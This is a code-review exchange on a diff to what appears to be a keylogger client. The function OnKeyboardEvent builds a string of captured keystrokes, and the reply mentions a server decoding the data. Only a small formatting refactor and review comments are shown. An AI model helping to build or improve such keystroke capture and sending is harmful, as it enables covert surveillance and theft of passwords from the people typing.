src/client.py

```diff
@@ -137,9 +134,9 @@ def OnKeyboardEvent(event):
     elif event == Key.space:
         strKeyLogs += " "
     elif type(event) == Key:  # if the character is some other type of special key
-        strKeyLogs += " [" + str(event)[4:] + "] "
+        strKeyLogs += f" [{str(event)[4:]}] "
     else:
-        strKeyLogs += str(event)[1:len(str(event)) - 1]  # remove quotes around character
+        strKeyLogs += f"{event}"
```

Comment:
you need to get rid of the quotes on either side of the character.

Reply:
could you make sure that invalid characters eg. latin ones do not cause the server to crash when decoding the data.